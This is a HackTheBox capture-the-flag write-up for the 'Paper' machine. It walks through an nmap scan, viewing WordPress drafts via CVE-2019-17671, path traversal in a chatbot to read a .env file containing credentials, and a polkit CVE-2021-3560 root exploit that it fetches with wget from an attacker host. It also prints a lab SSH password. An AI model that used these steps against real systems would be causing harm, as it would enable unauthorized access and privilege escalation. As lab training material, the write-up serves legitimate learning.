Paper - [HTB]
Paper is a pretty easy Linux machine from HackTheBox where the attacker will have to exploit a WordPress vulnerability (CVE-2019-17671), so we can get access to a chat web application, exploiting the services of a chatbot and becoming user. Finally, we will have to exploit the famous polkit vulnerability (CVE-2021-3560) in order to become root.
As always, let's start finding all opened ports in the machine with Nmap.
kali@kali:~/Documents/HTB/Paper$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.11.143 Warning: 10.10.11.143 giving up on port because retransmission cap hit (2). Nmap scan report for 10.10.11.143 Host is up (0.043s latency). Not shown: 61511 closed ports, 4021 filtered ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https kali@kali:~/Documents/HTB/Paper$
Then, we continue with a deeper scan of each opened port, getting more information about each service.
kali@kali:~/Documents/HTB/Paper$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80,443 10.10.11.143 Nmap scan report for 10.10.11.143 Host is up (0.042s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.0 (protocol 2.0) | ssh-hostkey: | 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA) | 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA) |_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519) 80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9) |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 |_http-title: HTTP Server Test Page powered by CentOS 443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9) |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 |_http-title: HTTP Server Test Page powered by CentOS | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US | Subject Alternative Name: DNS:localhost.localdomain | Not valid before: 2021-07-03T08:52:34 |_Not valid after: 2022-07-08T10:32:34 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Feb 14 15:19:20 2022 -- 1 IP address (1 host up) scanned in 16.38 seconds
Looking at the HTTP headers, we can find the domain office.paper.
kali@kali:~/Documents/HTB/Paper$ curl -i http://10.10.11.143/asdasd HTTP/1.1 404 Not Found Date: Mon, 14 Feb 2022 21:09:28 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 X-Backend-Server: office.paper Content-Length: 196 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html>
Once added to
/etc/hosts, we can access 's WordPress page.
Thanks to wpscan, we can know that this WordPress version has an associated vulnerability.
kali@kali:~/Documents/HTB/Paper$ wpscan --url http://office.paper/ -e ap,at,dbe,u --random-user-agent --detection-mode aggressive --plugins-detection aggressive --disable-tls-checks [...] | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts | Fixed in: 5.2.4 | References: | - https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308 | - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
We can exploit accessing the URL
http://office.paper/?static=1, obtaining a bunch of drafts. Between the drafts, we can see a register link.
test Micheal please remove the secret from drafts for gods sake! Hello employees of Blunder Tiffin, Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system. So, I kindly request you all to take your discussions from the public blog to a more private chat system. -Nick # Warning for Michael Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick Threat Level Midnight A MOTION PICTURE SCREENPLAY, WRITTEN AND DIRECTED BY MICHAEL SCOTT [INT:DAY] Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt…. # Secret Registration URL of new Employee chat system http://chat.office.paper/register/8qozr226AhkCHZdyY # I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick. # Also, stop looking at my drafts. Jeez!
This link leads us to a rocket.chat web application.
Once registered and logged in, we can find a bot on the general with instructions about how to use it.
To interact with recyclops, we need to create a private chat.
As we can see, recyclops can list files under the
Moreover, it is vulnerable to Path Traversal, so we can list files from upper directories.
../hubot/ directory there is a
.env file .
.env contains recyclop's credentials.
These credentials can be used to get the machine as Dwight through SSH.
kali@kali:~/Documents/HTB/Paper$ ssh email@example.com firstname.lastname@example.org's password: Queenofblad3s!23 [dwight@paper ~]$ cat user.txt [CENSORED]
Using Linpeash, we find that the polkit binary is a SUID binary.
SUID - Check easy privesc, exploits and write perms -rwsr-xr-x. 1 root root 61K May 11 2019 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614) -rwsr-xr-x 1 root root 34K May 11 2019 /usr/bin/fusermount3 -rwsr-xr-x. 1 root root 38K May 11 2019 /usr/bin/fusermount -rwsr-xr-x. 1 root root 18K May 11 2019 /usr/lib/polkit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 65K Nov 8 2019 /usr/bin/crontab -rwsr-xr-x 1 root root 33K Apr 6 2020 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997) -rwsr-xr-x 1 root root 21K Feb 2 2021 /usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper (Unknown SUID binary)
So, we can exploit it becoming root with the following exploit.
[dwight@paper tmp]$ wget http://10.10.14.223/CVE-2021-3560.py --2022-02-14 17:06:44-- http://10.10.14.223/CVE-2021-3560.py Connecting to 10.10.14.223:80... connected. HTTP request sent, awaiting response... 200 OK Length: 2434 (2.4K) [text/plain] Saving to: ‘CVE-2021-3560.py’ CVE-2021-3560.py 100%[==============>] 2.38K --.-KB/s in 0s 2022-02-14 17:06:44 (295 MB/s) - ‘CVE-2021-3560.py’ saved [2434/2434] [dwight@paper tmp]$ python3 CVE-2021-3560.py [...] [+] Timed out at: 0.00890119250816805 [+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root bash: cannot set terminal process group (79814): Inappropriate ioctl for device bash: no job control in this shell [root@paper tmp]# cat /root/root.txt [CENSORED]